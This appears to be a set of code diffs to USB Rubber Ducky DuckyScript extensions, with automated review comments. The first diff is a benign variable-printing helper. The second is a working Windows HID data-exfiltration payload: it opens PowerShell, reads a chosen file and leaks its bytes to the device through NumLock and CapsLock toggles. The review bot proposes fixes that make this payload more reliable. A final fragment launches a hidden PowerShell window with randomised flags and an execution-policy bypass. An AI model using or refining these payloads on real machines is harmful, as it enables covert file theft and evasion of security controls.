to work with converting variables in your payloads.
WHY:
Of the many ways to get information about the state of your payload
is by injecting static strings effectively as debugging prints
However, given the non-static nature of payloads using variables in
DuckyScript 3.0 - the ability to decode variables during payload
execution and print (inject) representations of their current state
can often be a critically helpful development and debugging tool.
REM Available Functions:
REM TRANSLATE_INT() - var to decimal string - set $INPUT prior to call
REM TRANSLATE_HEX() - var to hexidecimal string - set $INPUT prior to call
REM TRANSLATE_BINARY() - var to binary string - set $INPUT prior to call
REM TRANSLATE_BOOL() - var to boolean string - set $INPUT prior to call
Available Functions:
DEFAULT:
TRANSLATE_INT() - var to decimal string - set $INPUT prior to call
EXTENDED: (enabled using the #INCLUDE defines below):
TRANSLATE_HEX() - var to hexidecimal string - set $INPUT prior to call
TRANSLATE_BINARY() - var to binary string - set $INPUT prior to call
TRANSLATE_BOOL() - var to boolean string - set $INPUT prior to call
REM USAGE:
REM set $INPUT to desired var
REM call the correct translate_ function for the expected data type e.g.
REM VAR $myVar = 1234
REM $INPUT = $myVar
REM TRANSLATE_INT()
REM REM the above code will inject 1234
USAGE:
set $INPUT to desired var
call the correct translate_ function for the expected data type e.g.
VAR $myVar = 1234
$INPUT = $myVar
TRANSLATE_INT()
REM the above code will inject 1234
END_REM
REM begin extension variables
DEFINE PRINT_INT 0
DEFINE PRINT_HEX 1
VAR $DIGIT_PRINT_MODE = PRINT_INT
REM CONFIGURATION:
DEFINE #INCLUDE_TRANSLATE_HEX FALSE
DEFINE #INCLUDE_TRANSLATE_BOOL FALSE
DEFINE #INCLUDE_TRANSLATE_BINARY FALSE
DEFINE #INCLUDE_SWAP_ENDIAN FALSE
REM Append ENTER after translation
VAR $AS_STRINGLN = TRUE
DEFINE #PRINT_INT 0
DEFINE #PRINT_HEX 1
VAR $DIGIT_PRINT_MODE = #PRINT_INT
VAR $D = 0
VAR $IN = 0
VAR $INPUT = 0
VAR $MOD = 0
VAR $P = FALSE
VAR $NL = TRUE
REM end extension variables
REM REQUIRED for INT/HEX - convert int to char
FUNCTION PRINTDIGIT()
@ -59,20 +70,22 @@ EXTENSION TRANSLATE
STRING 8
ELSE IF ($D == 9) THEN
STRING 9
ELSE IF ($DIGIT_PRINT_MODE == PRINT_HEX) THEN
IF ($D == 10) THEN
STRING A
ELSE IF ($D == 11) THEN
STRING B
ELSE IF ($D == 12) THEN
STRING C
ELSE IF ($D == 13) THEN
STRING D
ELSE IF ($D == 14) THEN
STRING E
ELSE IF ($D == 15) THEN
STRING F
END_IF
IF_DEFINED_TRUE #INCLUDE_TRANSLATE_HEX
ELSE IF ($DIGIT_PRINT_MODE == #PRINT_HEX) THEN
IF ($D == 10) THEN
STRING A
ELSE IF ($D == 11) THEN
STRING B
ELSE IF ($D == 12) THEN
STRING C
ELSE IF ($D == 13) THEN
STRING D
ELSE IF ($D == 14) THEN
STRING E
ELSE IF ($D == 15) THEN
STRING F
END_IF
END_IF_DEFINED
ELSE
STRING ?
END_IF
@ -91,15 +104,18 @@ EXTENSION TRANSLATE
END_IF
END_FUNCTION
REM ENDIAN SWAPPER helper, (useful for working with VID/PID)
FUNCTION SWAP_ENDIAN()
$INPUT = ((($INPUT >> 8) & 0x00FF) | (($INPUT << 8) & 0xFF00))
END_FUNCTION
IF_DEFINED_TRUE #INCLUDE_SWAP_ENDIAN
REM ENDIAN SWAPPER helper, (useful for working with VID/PID)
FUNCTION SWAP_ENDIAN()
$INPUT = ((($INPUT >> 8) & 0x00FF) | (($INPUT << 8) & 0xFF00))
END_FUNCTION
END_IF_DEFINED
REM Translates a variable of presumed integer type and attempts to convert
REM and inject a DECIMAL string representation
FUNCTION TRANSLATE_INT()
$DIGIT_PRINT_MODE = PRINT_INT
$DIGIT_PRINT_MODE = #PRINT_INT
$P = FALSE
IF ( $INPUT >= 10000) THEN
$MOD = 10000
@ -119,99 +135,108 @@ EXTENSION TRANSLATE
END_IF()
$D = $INPUT
PRINTDIGIT()
IF $NL THEN
IF $AS_STRINGLN THEN
ENTER
END_IF
END_FUNCTION
REM Translates a variable of presumed boolean type and attempts to convert
REM and inject a BOOLEAN string representation
FUNCTION TRANSLATE_BOOL()
IF $INPUT THEN
STRING TRUE
ELSE
STRING FALSE
END_IF
IF $NL THEN
ENTER
END_IF
END_FUNCTION
REM TO ENABLE SET INCLUDE_TRANSLATE_BOOL to TRUE before compiling
IF_DEFINED_TRUE #INCLUDE_TRANSLATE_BOOL
FUNCTION TRANSLATE_BOOL()
IF $INPUT THEN
STRING TRUE
ELSE
STRING FALSE
END_IF
IF $AS_STRINGLN THEN
ENTER
END_IF
END_FUNCTION
END_IF_DEFINED
REM Translates a variable of presumed integer type and attempts to convert
REM and inject a HEX string representation
FUNCTION TRANSLATE_HEX()
$DIGIT_PRINT_MODE = PRINT_HEX
VAR $chars = 0
VAR $d1 = 0
VAR $d2 = 0
VAR $d3 = 0
VAR $d4 = 0
WHILE ($INPUT > 0)
REM TO ENABLE SET INCLUDE_TRANSLATE_HEX to TRUE before compiling
IF_DEFINED_TRUE #INCLUDE_TRANSLATE_HEX
FUNCTION TRANSLATE_HEX()
$DIGIT_PRINT_MODE = #PRINT_HEX
VAR $chars = 0
VAR $d1 = 0
VAR $d2 = 0
VAR $d3 = 0
VAR $d4 = 0
WHILE ($INPUT > 0)
IF ($chars == 0) THEN
$d1 = ($INPUT % 16)
ELSE IF ($chars == 1) THEN
$d2 = ($INPUT % 16)
ELSE IF ($chars == 2) THEN
$d3 = ($INPUT % 16)
ELSE IF ($chars == 3) THEN
$d4 = ($INPUT % 16)
END_IF
$chars = ($chars + 1)
$INPUT = ($INPUT / 16)
END_WHILE
VAR $i = 0
STRING 0x
IF ($chars == 0) THEN
$d1 = ($INPUT % 16)
STRING 0x0000
ELSE IF ($chars == 1) THEN
$d2 = ($INPUT % 16)
STRING 000
$D = $d1
PRINTDIGIT()
ELSE IF ($chars == 2) THEN
$d3 = ($INPUT % 16)
STRING 00
$D = $d2
PRINTDIGIT()
$D = $d1
PRINTDIGIT()
ELSE IF ($chars == 3) THEN
$d4 = ($INPUT % 16)
STRING 0
$D = $d3
PRINTDIGIT()
$D = $d2
PRINTDIGIT()
$D = $d1
PRINTDIGIT()
ELSE IF ($chars == 4) THEN
STRING 0
$D = $d4
PRINTDIGIT()
$D = $d3
PRINTDIGIT()
$D = $d2
PRINTDIGIT()
$D = $d1
PRINTDIGIT()
END_IF
$chars = ($chars + 1)
$INPUT = ($INPUT / 16)
END_WHILE
VAR $i = 0
STRING 0x
IF ($chars == 0) THEN
STRING 0x0000
ELSE IF ($chars == 1) THEN
STRING 000
$D = $d1
PRINTDIGIT()
ELSE IF ($chars == 2) THEN
STRING 00
$D = $d2
PRINTDIGIT()
$D = $d1
PRINTDIGIT()
ELSE IF ($chars == 3) THEN
STRING 0
$D = $d3
PRINTDIGIT()
$D = $d2
PRINTDIGIT()
$D = $d1
PRINTDIGIT()
ELSE IF ($chars == 4) THEN
STRING 0
$D = $d4
PRINTDIGIT()
$D = $d3
PRINTDIGIT()
$D = $d2
PRINTDIGIT()
$D = $d1
PRINTDIGIT()
END_IF
IF $NL THEN
ENTER
END_IF
END_FUNCTION
IF $AS_STRINGLN THEN
ENTER
END_IF
END_FUNCTION
END_IF_DEFINED
REM Translates a variable of presumed integer type and attempts to convert
REM and inject a BINARY string representation
FUNCTION TRANSLATE_BINARY()
VAR $I = 16
WHILE ( $I > 0 )
$I = ($I - 1)
IF (($INPUT & 0x8000) == 0 ) THEN
STRING 0
ELSE
STRING 1
REM TO ENABLE SET INCLUDE_TRANSLATE_BINARY to TRUE before compiling
IF_DEFINED_TRUE #INCLUDE_TRANSLATE_BINARY
FUNCTION TRANSLATE_BINARY()
VAR $I = 16
WHILE ( $I > 0 )
$I = ($I - 1)
IF (($INPUT & 0x8000) == 0 ) THEN
STRING 0
ELSE
STRING 1
END_IF
$INPUT = ($INPUT << 1)
END_WHILE
IF $AS_STRINGLN THEN
ENTER
END_IF
$INPUT = ($INPUT << 1)
END_WHILE
IF $NL THEN
ENTER
END_IF
END_FUNCTION
END_FUNCTION
END_IF_DEFINED
END_EXTENSION
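Review bot: TRANSLATE_HEX() emits `STRING 0x` unconditionally and then, for a zero input (`$chars == 0`), `STRING 0x0000`, so zero is injected as `0x0x0000`; that arm should be `STRING 0000`. The `$chars == 4` arm also prefixes `STRING 0` before its four digits, producing five-character output (`0x0FFFF` for 0xFFFF) while every other arm pads to exactly four, so that `STRING 0` should be removed; `VAR $i = 0` in the same function is never used. The documentation lists the EXTENDED functions but omits SWAP_ENDIAN(), which is now gated by `#INCLUDE_SWAP_ENDIAN` — add `SWAP_ENDIAN() - swap the two bytes of $INPUT (useful for VID/PID) - set $INPUT prior to call` to that list, and the three "TO ENABLE SET INCLUDE_TRANSLATE_x" REMs should name the defines with their `#` prefix so they match the CONFIGURATION section.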


@ -1,51 +1,91 @@
EXTENSION WINDOWS_HID_EXFIL
REM VERSION 1.0
REM VERSION 1.1
REM AUTHOR: Korben
REM Helpers for Keystroke Reflection data exfiltration
REM This payload is a proof of concept for USB HID only Data Exfiltration
REM_BLOCK DOCUMENTATION
Helpers for Keystroke Reflection data exfiltration
This payload is a proof of concept for USB HID only Data Exfiltration
REM TARGET:
REM Windows Hostthat supports powershell and SendKeys
TARGET:
Windows Host that supports powershell and SendKeys
REM USAGE:
REM Uncomment the function call below to run this extension inline
REM or call RUN_EXFIL() anywhere in your payload after the extension
USAGE:
Prepare data to exfil (in filename defined by TARGET_FILE below)
with a powershell window already open - call RUN_WINDOWS_EXFIL()
REM DEPLOYMENT:
REM Plug Ducky into host, wait for the LED to turn (and stay) solid Green.
DEPLOYMENT:
Plug Ducky into host, wait for the LED to turn (and stay) solid green.
END_REM
REM CONFIGURATION:
REM File on host machine to exfil using Keystroke Reflection attack
DEFINE TARGET_FILE filename.txt
REM File on host machine to exfil
DEFINE #TARGET_FILE filename.txt
DEFINE #SAVE_AND_RESTORE_LOCKS TRUE
DEFINE #ENABLE_EXFIL_LEDS TRUE
DEFINE #CLOSE_AFTER_EXFIL TRUE
DEFINE #RUN_SIMPLE_USAGE_DEMO FALSE
FUNCTION RUN_WINDOWS_EXFIL()
REM Boot
LED_OFF
DELAY 500
REM Launch Windows RUN dialog
GUI r
DELAY 50
REM Launch powershell
STRING powershell
ENTER
DELAY 250
REM Save HOSTs current lock state
SAVE_HOST_KEYBOARD_LOCK_STATE
REM Start Listening - Enable EXFIL mode, Enable EXFIL mode for Device LEDS
IF_DEFINED_TRUE #SAVE_AND_RESTORE_LOCKS
SAVE_HOST_KEYBOARD_LOCK_STATE
END_IF_DEFINED
IF_DEFINED_TRUE #ENABLE_EXFIL_LEDS
LED_OFF
$_EXFIL_LEDS_ENABLED = TRUE
END_IF_DEFINED
$_EXFIL_MODE_ENABLED = TRUE
$_EXFIL_LEDS_ENABLED = TRUE
REM Convert and reflect target file
STRING foreach($b in $(Get-Content "TARGET_FILE" -Encoding byte)){foreach($a in 0x80,0x40,0x20,0x10,0x08,0x04,0x02,0x01){If($b -band $a){$o+="%{NUMLOCK}"}Else{$o+="%{CAPSLOCK}"}}};$o+="%{SCROLLLOCK}";Add-Type -Assembly System.Windows.Forms;[System.Windows.Forms.SendKeys]::SendWait("$o");exit;
STRING_POWERSHELL
foreach($b in $(Get-Content "#TARGET_FILE" -Encoding byte)){
foreach($a in 0x80,0x40,0x20,0x10,0x08,0x04,0x02,0x01){
If($b -band $a){
$o+="%{NUMLOCK}"
}Else{
$o+="%{CAPSLOCK}"
}
}
};
$o+="%{SCROLLLOCK}";
Add-Type -Assembly System.Windows.Forms;
[System.Windows.Forms.SendKeys]::SendWait("$o");
exit;
END_STRING
IF_DEFINED_TRUE #CLOSE_AFTER_EXFIL
STRING exit;
END_IF_DEFINED
ENTER
REM Listen for EOF
WAIT_FOR_SCROLL_CHANGE
REM Indicate SUCCESS on Device LED, Disable EXFIL mode
LED_G
$_EXFIL_MODE_ENABLED = FALSE
REM Restore HOSTs lock state to original
RESTORE_HOST_KEYBOARD_LOCK_STATE
IF_DEFINED_TRUE #ENABLE_EXFIL_LEDS
LED_G
END_IF_DEFINED
IF_DEFINED_TRUE #SAVE_AND_RESTORE_LOCKS
RESTORE_HOST_KEYBOARD_LOCK_STATE
END_IF_DEFINED
END_FUNCTION
REM Uncomment the function call below to run this extension inline (here)
REM or call RUN_WINDOWS_EXFIL() anywhere in your payload after the extension
REM RUN_WINDOWS_EXFIL()
IF_DEFINED_TRUE #RUN_SIMPLE_USAGE_DEMO
REM DO NOT MODIFY THIS DEMO - copy and move outside extension if using as template.
REM DEMO Boot Delay
DELAY 3000
REM Open run dialog
GUI r
DELAY 500
REM Open Powershell
STRINGLN powershell
DELAY 500
REM Prepare some data in TARGET_FILE
STRINGLN echo test123 > #TARGET_FILE
DELAY 500
REM Exfil data to USB Rubber Ducky using Keystroke Reflection
RUN_WINDOWS_EXFIL()
END_IF_DEFINED
END_EXTENSION
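Review bot: The `exit;` on the last line of the STRING_POWERSHELL block runs unconditionally, so the following `IF_DEFINED_TRUE #CLOSE_AFTER_EXFIL` / `STRING exit;` is redundant and `#CLOSE_AFTER_EXFIL FALSE` cannot keep the PowerShell window open; delete the `exit;` inside the block so the define works, matching the Linux extension where only the conditional `exit;` exists. `Get-Content -Encoding byte` is accepted by Windows PowerShell 5.1 but was removed in PowerShell 7 in favour of `-AsByteStream`, so the TARGET documentation should say `Windows PowerShell 5.1 (powershell.exe as launched from the Run dialog); not PowerShell 7/pwsh`. Note also that `$o+="%{SCROLLLOCK}"` is appended even when Get-Content fails (a non-terminating error on a missing file), so WAIT_FOR_SCROLL_CHANGE returns and LED_G lights with zero bytes exfiltrated; the REM before LED_G should say it indicates the EOF marker was received rather than that data arrived, and there is no timeout path if PowerShell never starts, in which case RESTORE_HOST_KEYBOARD_LOCK_STATE is never reached.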


@ -103,7 +103,7 @@ EXTENSION Rolling_Powershell_Execution
STRING powershell.exe -noP -nOnI -windo H
END_IF
IF_DEFINED #EXECUTIONPOLICY
IF_DEFINED_TRUE #EXECUTIONPOLICY
SPACE
IF (($RANDOM_PS % 2) == 0) THEN
STRING -ep ByPasS